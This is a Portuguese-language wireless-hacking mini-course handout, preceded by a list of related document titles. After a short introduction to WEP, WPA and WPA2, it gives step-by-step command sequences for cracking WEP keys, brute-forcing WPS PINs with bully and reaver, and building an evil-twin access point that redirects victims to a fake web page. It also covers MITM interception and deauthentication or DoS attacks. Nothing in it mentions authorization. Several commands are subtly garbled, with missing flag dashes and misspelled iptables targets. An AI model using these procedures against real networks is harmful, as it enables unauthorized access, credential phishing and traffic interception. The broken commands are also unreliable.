Mini-curso Vulnerabilidades em Redes Wireless

Documentos relacionados
Configuração do Servidor Gateway Firewall e DHCP

Análise de Redes Wireless Suíte Aircrack-ng

Tem um Raspberry Pi 3? Saiba como transformá-lo num AP Wifi

Configuração dos ajustes da tecnologia Wireless básica em RV215W

Redes. Informações e exploits de todos os assuntos relacionados a redes. Não confundir com web! Wi-Fi. Introdução. Crackeando WPA/WPA2.

Ponto de Acesso Sem Fio

Sumário. Introdução Fundamentos e Conceitos das Redes Sem Fio Autenticação e Criptografia em uma Rede Wi-Fi.. 31

Redes sem Fio Segurança em WLANs (802.11) Parte 02. Ricardo Kléber. Ricardo Kléber

Mecanismos de segurança

Redes Sem Fio. Alberto Felipe Friderichs Barros

Ajustes da tecnologia Wireless básica no VPN Router CVR100W

WIRELESS (WI-FI) REDES E SR1 ETER-FAETEC. Rio de Janeiro - RJ ETER-FAETEC

Laboratório 2. Configurando o Serviço DHCP

Procedimentos para configuração do DWL-G700AP em modo Access Point

Instalação e Configuração do Servidor de DHCP

Configuração sem fio em RV180W

Dtec - Ubuntu Desktop 9.04 para Thin Clients Versão 1 APRESENTAÇÃO

Ataques ao Wi-Fi. Prof. Marcos Monteiro

LAB DHCP Configuração do serviço DHCP

Lojamundi Tecnologia Sem Limites br

Redes sem fio IEEE Prof. Dr. Ruy de Oliveira IFMT

Introdução aos testes de segurança em redes sem fio com Aircrack-NG

Engenharia de Segurança (SSC -0747)

Administração dos serviços de redes utilizando linux

Procedimentos para configuração em modo WDS with AP

Redes de Computadores

Procedimentos para configuração em modo WDS with AP

Redes Domésticas. Adrian C. Ferreira 07/08/2017

Manual do Usuário OIW-2442EX b/g/n 300Mbps Wireless Extender Versão 1.0 Última atualização Janeiro de 2015.

Modem ADSL. Resumo de Configurações

Segurança Informática e nas Organizações. Guiões das Aulas Práticas

Configuração do Evo-W54ARv2 em modo AP

Procedimentos para configuração do DWL-G700AP em modo Repeater

Índice. Introdução...3

Configuração do bridge de grupo de trabalho nos Access point WAP551 e WAP561

Segurança em Redes e Sistemas Operacionais

Rede Wireless da FEUP

LUIS GUILHERME MACHADO CAMARGO PEDRO ALBERTO DE BORBA RICARDO FARAH STEFAN CAMPANA FUCHS TELMO FRIESEN MAPEAMENTO DE AMBIENTES COM O ROBÔ BELLATOR

Roteador Wireless de 1800 ISR com exemplo de configuração interno DHCP e de autenticação aberta

Atualizando sua Smart TV. Via Pen Drive. Conectando sua Smart TV. Rede Wi-Fi. Conectando sua Smart TV. Via Cabo. 04 Dúvidas? Perguntas Frequentes

Configuração do Evo-W54ARv2 em modo Cliente

WEP, WPA e EAP. Rodrigo R. Paim

Configurar ajustes da segurança Wireless em um WAP

MANUAL DO USUARIO NX WIFI

Configurando Interface de Rede. IPTABLES Firewall em Linux Kernel 2.4 em diante. Regras do Iptables. Iptables. Regras do Iptables. Comandos Principais

Configurar ajustes do bridge de grupo de trabalho nos Access point WAP125 ou WAP581

Aula 2 DHCP. (Dinamic Host Configuration Protocol) Servidor DHCP. Prof. Roitier Campos Gonçalves

Atacando redes wifi com Aircrack-ng protegidas com criptografia WPA e WPA2. Wi-Fi Protected Access (WAP)

III WTR do POP-BA III Workshop de Tecnologias de Redes Ponto de Presença da RNP na Bahia Instrutor: Ibirisol Fontes Monitor: Jundaí Abdon.

Guia de Configurações do Wi-Fi

Configurar ajustes da segurança Wireless no WAP125 e no WAP581

Procedimentos para configuração do DWL-2100AP em modo Repeater

Introdução a Sistemas Abertos Configuração de Rede

Disciplina: Fundamentos de serviços IP Alunos: Estevão Elias Barbosa Lopes e Leonardo de Azevedo Barbosa

DHCP. Administração de Redes de Computadores Prof.ª Juliana Camilo Ângelo, Bryan, Carlos, Vinícius

PROJETO LÓGICO DE REDE

REDES DE COMPUTADORES

INSTALANDO O HYPER-V EM SISTEMAS OPERACIONAIS WINDOWS

Assistente de configuração em RV215W

HTTP, SMTP, FTP, SSH, DNS,... Domínios: TCP, UDP. porta: :80, : Endereço de IP: IP, ICMP,...

Preparação AV3 Fundamentos de Redes de Computadores

isso é fácil de ser feito, mas em grandes redes isso se torna uma tarefa muito trabalhosa

Para realizar o procedimento de configuração de Bridge with AP, será necessário que os DAP-1360 estejam ligados ao computador por um cabo Ethernet.

AP Router WR b+g Wireless Router. Manual Do Usuário

Projeto de Ensino. iptables. Grupo de Estudos em Tecnologia de Redes e Processamento Paralelo. Prof. Luiz Antonio Unioeste

Exemplo de Configuração de Wi-Fi Protected Access 2 (WPA 2)

Procedimentos para configuração de WDS With AP

Compartilhamento da internet, firewall

W-R2000nL v1.3 Guia de instalação

INSTALAÇÃO PRINTERTUX. Tutorial

RCO2. WLAN: Segurança e IEEE

Roitier Campos Gonçalves Goiânia, 18 de Novembro de Criando um Servidor Proxy/Firewall com Squid + IPTables!

Daniel Moreno. Novatec

Cisco recomenda que você tem o conhecimento do CUCM e dos pontos de acesso da Cisco.

Etapas para configurar o Cisco Aironet 1142 e o telefone do Wi-fi do registro 7925 com CUCM

Tópicos Especiais em Informática

Guia Rápido Roteador RE041. quickguide_rv1.indd 1 21/09/ :42:40

LAB012 Configuração de uma rede privada virtual (VPN) com a aplicação IPsec 1

Como Instalar Nagios 4 E Monitorar Seus Servidores no Ubuntu 14 Introdução

Universidade do Contestado Campus Concórdia. Curso de Sistemas de Informação Prof.: Maico Petry. Ciclo de Palestras e Minicursos

GUIA DE INSTALAÇÃO RÁPIDA CÓD.:6810-6

Prática NAT/Proxy. Edgard Jamhour. Esses exercícios devem ser executados através do servidor de máquinas virtuais: espec.ppgia.pucpr.

LABORATÓRIO IPV6.1. INTRODUÇÃO AO IPV6 Documento versão 0.1. Aluno: Paulo Henrique Moreira Gurgel #

APRESENTAÇÃO CARACTERÍSTICA

Projeto AirStrike: Um Sistema com Acesso Seguro e Gerenciamento Integrado para Redes sem Fio Baseadas no padrão

SAP Business One 8.8. How to Connect Mobile App to B1 Demo System

Configuração de Rede Wireless com Segurança no Evo-W108AR

Guia para Acesso Remoto

Instalação e Configuração Iptables ( Firewall)

Minicurso. Análise de Redes usando Wireshark

Firewalls - IPTables. Carlos Gustavo A. da Rocha. ASSR

Serviços de Redes. Aula 03 - Servidor DHCP

Manual de Configuração.

Utilizando IP na iluminação Cênica

Configuração do Evo-W54ARv2 em modo Repetidor WDS

O Servidor de impressão DP-300U atende a seguinte topologia: Podem ser conectadas 2 impressoras Paralelas e 1 USB.

Tecnologias e Componentes de Redes

Monday, November 16, 2009 EAP. Extensible Authentication Protocol

Transcrição:

Mini-curso Vulnerabilidades em Redes Wireless Junho 2015 Guilherme Junqueira Solyd - CaveiraTech

1. Introdução à criptografia em redes sem fio Você está todo feliz, pois acaba de comprar o seu roteador WiFi e finalmente vai poder compartilhar sua internet pela casa toda, para usar em seu vídeo game, celular, notebook e qualquer outro dispositivo. Quando receber os amigos em casa, todos vão poder subir fotos para o Facebook ou Instagram sem depender da conexão 3G. Mas, na hora de configurar, vem a dúvida: o que são todas aquelas siglas e protocolos de segurança? No momento de configurar a rede, você vai se deparar com os termos WEP, WPA e WPA2. Na ordem, estamos falando de padrões do mais antigo para o mais recente, e essa sequência história também é refletida em termos de segurança. Quanto mais novo o sistema, mais protegidos estarão os seus dados e conexão. Então, o que quer dizer cada sigla dessa sopa de letrinhas? WEP: Wired Equivalent Privacy O algoritmo de segurança que já foi o mais usado do mundo foi criado em 1999 e é compatível com praticamente todos os dispositivos WiFi disponíveis no mercado. Justamente por ser tão popular, é também o mais sujeito a falhas de segurança e o que possui mais buracos conhecidos. O padrão WEP se torna mais inseguro à medida que o poder de processamento dos computadores aumenta. Por ser um sistema de segurança de 128 bits (fator que define os caracteres possíveis, ou seja, o número máximo de combinações de senha), é possível descobrir a palavra-passe de uma rede WiFi desse tipo em poucos minutos por meio de um software de ataques. Oficialmente, o WEP não é considerado um padrão desde 2004, quando a Wi-Fi Alliance associação que certifica produtos sem fio e promove a tecnologia encerrou o suporte a ele. É altamente recomendado que você não use esse protocolo. WPA: Wi-Fi Protected Access Quando o WEP saiu de circulação, o WPA entrou em seu lugar como o protocolo-padrão da indústria. Adotado formalmente em 2003, a novidade trazia encriptação 256 bits e uma segurança muito maior para as redes. Além disso, sistemas de análise de pacotes para verificar alterações e invasões e outras ferramentas foram implementadas para melhorar a segurança. O problema aqui é que a arquitetura WPA foi produzida de forma a não tornar os dispositivos WEP obsoletos, e sim atualizáveis. Com isso, uma série de elementos do protocolo antigo foi reaproveitada e, com ela, diversos dos problemas do antecessor também acabaram presentes na nova versão. A descoberta de senhas por meio de processamento também é uma ameaça aqui, mas não acontece exatamente da mesma maneira que no antecessor. Em vez de usar a força bruta para descobrir senhas, os criminosos podem atingir sistemas suplementares, herdados do protocolo WEP, que servem para facilitar a configuração e conexão entre dispositivos antigos e modernos.

WPA2: Wi-Fi Protected Acces II O sistema-padrão atual e também o mais seguro, implementado pela Wi-Fi Alliance em 2006. A diferença aqui é a maneira como o sistema lida com senhas e algoritmos, excluindo completamente a possibilidade de um ataque de força bruta. Sendo assim, esse é o tipo mais seguro da atualidade. Segundo especialistas, o risco de intrusões para usuários domésticos com WPA2 é praticamente zero. Isso se deve a duas outras siglas incompreensíveis. O AES (Advanced Encryption Standard), um novo padrão para a segurança das informações, e o CCMP (Counter Cipher Mode), um mecanismo de encriptação que protege os dados que passam pela rede. Uma das poucas vulnerabilidades conhecidas atinge diretamente usuários corporativos e exige que o atacante possua acesso normal à rede sem fio. Uma vez conectado, o hacker poderia assumir o controle de outros dispositivos ligados à rede, incluindo dados contidos neles ou transferidos a partir das máquinas. Mais uma vez, isso se deve a programações de compatibilidade para ligação de roteadores antigos e modernos.

2. Endereço MAC O Endereço MAC (Media Access Control) é um endereço físico associado à interface de comunicação, que conecta um dispositivo à rede. O MAC é um endereço único, não havendo duas portas com a mesma numeração, e usado para controle de acesso em redes de computadores. Sua identificação é gravada em hardware, isto é, na memória ROM da placa de rede de equipamentos como desktops, notebooks, roteadores, smartphones, tablets, impressoras de rede, etc. 2.1. Controlando o Endereço MAC 2.1.1. Sistema Linux Mudando seu MAC Address: wlan0 down #macchanger r wlan0 wlan0 up //Desliga a placa de rede //Muda o MAC para um endereço randômico //Liga a placa de rede 2.1.2. Sistema Windows Utilizar programa TMACv6. Várias restrições são encontradas. Uso não recomendado. 3. Quebrando a criptografia WEP 3.1. Método 1 Com clientes conectados Caso seja necessário faça o MAC Spoofing

Monitorando uma rede especifica e gravando logs #airodump-ng w <nome_do_arquivo_de_log> c <canal> --bssid <bssid_atacado> mon0 Arrumando BUG: fixed channel: -1 Parar o monitoramento anterior Desligar o dispositivo wlan0 wlan0 down Para contornar o bug fixed channel: -1 também pode ser utilizado o parâmetro --ignororenegative-one na frente dos comandos. Reiniciar o monitoramento #airodump-ng w <nome_do_arquivo_de_log> c <canal> --bssid <bssid_atacado> mon0 Fazendo Handshake #aireplay-ng -1 0 a <bssid_atacado> -e <essid_atacado> mon0 Injetando Pacotes #aireplay-ng -3 b <bssid_atacado> mon0 Crackeando a senha #aircrack-ng <nome_do_arquivo_de_log>-01.cap Só esperar e ser feliz com sua senha Não se esqueça de reativar a interface wlan0 e de desativar a interface mon0 wlan0 up #airmon-ng stop mon0 Lembrando que este método precisa que haja clientes conectados à rede e que estes façam trocas de pacotes ARP, caso não haja clientes e nem trocas de pacotes ARP, use o método 2 de ataque. 3.2. Método 2 Sem clientes Para que este método funcione não poderá haver clientes conectados à rede. Iremos forjar um pacote ARP e replicá-lo na rede. Caso seja necessário faça o MAC Spoofing Monitorando uma rede especifica e gravando logs #airodump-ng w <nome_do_arquivo_de_log> c <canal> --bssid <bssid_atacado> mon0 Fazendo Handshake (Falsa autenticação) #aireplay-ng -1 0 a <bssid_atacado> -e <essid_atacado> mon0

Fazendo Chopchop para obter PGRA #aireplay-ng -5 -b <bsssid> mon0 Forjando o pacote ARP através do PGRA criado #packetforge-ng -0 -a <bssid_atacado> -h <MAC da placa atacante> -k 255.255.255.255 -l 255.255.255.255 y <arquivo criado com o chopchop.xor> -w arp-request Injetando pacotes ARP forjados aireplay-ng -2 -r arp-request ath0 Crackeando a senha #aircrack-ng <nome_do_arquivo_de_log>-01.cap Alternativamente pode ser utilizado um comando que substitui todas as etapas anteriores mas pode ser mais demorado. Método p0841 # aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b <bssid atacado> -h <MAC da placa atacante> mon0 4. Buscando redes WPA com WPS Comando wash #wash i mon0 Busque por redes que tenha NO no WPS Locked. 5. Quebrando redes WPA/WPA2 com WPS Caso seja necessário faça o MAC Spoofing Crackeando a senha com Bully #bully b <bssid> -c <canal> mon0 Seja feliz com sua senha! Hehehe. Obs.: Forçando um PIN: #bully b <bssid> -c <canal> -p <pin_inicial> -B --force mon0

6. Quebrando redes WPS com Pixel Dust Fazendo update no Reaver #apt-get update #apt-get install reaver Caso seja necessário faça o MAC Spoofing Crackeando a senha com Bully #reaver b <bssid> -c <canal> -K 1 -i mon0 7. TwinEvil Ataque Passar a Rede para modo Bridge na VM Ativar modo monitor #airmon-ng start wlan0 Download OUI File (Arquivo com fabricantes de roteadores) - Opcional #airodump-ng-oui-update Rastreando conexões #airodump-ng M mon0 Criando o falso AP #airbase e <nome_da_rede_falsa> -c <canal> -P mon0 Configurar IP em at0 at0 up at0 192.168.2.1/24 Adicionar Routing Table #route add -net 192.168.2.0 netmask 255.255.255.0 gw 192.168.2.1 Instalando Servidor DHCP #apt-get install dhcp3-server Configuran DHCP server #nano /etc/dhcpd.conf

Configure o arquivo dhcpd.conf: authoritative; default-lease-time 600; max-lease-time 7200; subnet 192.168.2.0 netmask 255.255.255.0 { option subnet-mask 255.255.255.0; option broadcast-address 192.168.2.255; option routers 192.168.2.1; option domain-name-servers 8.8.8.8; range 192.168.2.100 192.168.2.175; } Iniciar servidor DHCP #dhcpd cf /etc/dhcpd.conf pf /var/run/dhcpd.pid at0 #/etc/init.d/isc-dhcp-server start Habilitar IP Fowarding #echo 1 > /proc/sys/net/ipv4/ip_foward Pegar IP local #ip route Configure o IPTables de acordo com o ataque desejado Ataque 1 - Evil Twin: #iptables --flush #iptables --table nat --flush #iptables --delete-chain #ptables --table nat --delete-chain #iptables --table nat --append POSTROUTNG --out-interface eth0 j MARQUERADE #iptables --append FORWARD --in-interface at0 j ACCEPT #iptables t nat A PREROUTING p tcp --dport 80 j DNAT --to-destination <ip local>:80 #iptables t nat A POSTROUTING j MASQUERADE Ativar servidor apache e mysql #service apache2 start #service mysql start Configurar a página web na pasta: #cd /var/www/ Ataque 2 - MITM Rogue AP #iptables --flush #iptables --table nat --flush #iptables --delete-chain #iptables --table nat --delete-chain #iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE #iptables --append FORWARD --in-interface at0 -j ACCEPT

Para ler os pacotes no ataque MITM basta utilizar o Wireshark ou outra ferramenta para monitorar a interface at0 8. Ataques DoS Para efetuar ataques DoS, utilize a ferramenta: #mdk3 Para ataques de desautenticação, pode ser utilizado a ferramenta: #aireplay-ng 9. Referências Solyd Tecnologia em Servidores e Segurança da Informação https://solyd.com.br Canal Caveiratech: https://youtube.com.br/caveiratech Fórum CaveiraTech http://caveiratech.com/forum Documentação Aircrack: http://aircrack-ng.org